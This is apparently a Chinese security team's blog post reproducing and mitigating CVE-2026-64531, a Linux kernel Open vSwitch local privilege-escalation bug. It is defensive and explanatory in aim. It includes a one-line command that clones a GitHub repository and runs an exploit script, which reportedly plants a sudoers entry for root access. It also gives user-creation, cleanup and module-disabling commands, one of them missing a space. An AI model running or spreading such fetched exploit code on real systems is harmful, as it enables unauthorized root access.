复现与修复指南:Linux内核本地提权漏洞OVSwrap(CVE-2026-64531)

· 2026-08-28 11:07 · 5 阅读

秀逗猫 2026-08-28 11:07 辽宁

CVE-2026-64531是Linux内核Open vSwitch(OVS)模块中的一个本地提权漏洞。该漏洞源于OVS在处理特定Netlink消息时对隧道元数据(Tunnel Metadata)的边界检查缺失,导致低权限用户可以通过构造恶意数据包触发堆缓冲区溢出,进而覆写内核关键数据结构,实现从普通用户到root的权限提升。

研究者技术博文:https://heyitsas.im/posts/ovswrap/

复现指南

此PoC基于内存破坏,成功利用后内核处于不稳定状态。reboot/shutdown等正常关机命令极大概率卡死在内核态清理阶段,仅能通过硬断电/强制重启恢复。请务必在测试环境或快照虚拟机中操作,严禁在生产环境执行。

创建新的低权限用户

useradd -s /bin/bash -m pseudo
echo pseudo:cat@md5 | chpasswd

使用低权限用户登录ssh后,执行

git clone https://github.com/manizada/OVSwrap && cd OVSwrap && python3 ovswrap-poc.py

执行一次成功后会自动将测试用户加入sudoers,即可通过sudo -i提权。

清除sudoers后门:

rm -rf /etc/sudoers.d/ovs_*

修复指南

升级内核至包含该CVE修复补丁的版本。

临时缓解方案:

# 创建禁用配置文件
echo"install openvswitch /bin/false" | sudo tee /etc/modprobe.d/disable-openvswitch.conf

结束

招新小广告

ChaMd5 Venom 招收大佬入圈

新成立组IOT+工控+样本分析 长期招新

欢迎联系admin@chamd5.org

图片

跳转微信打开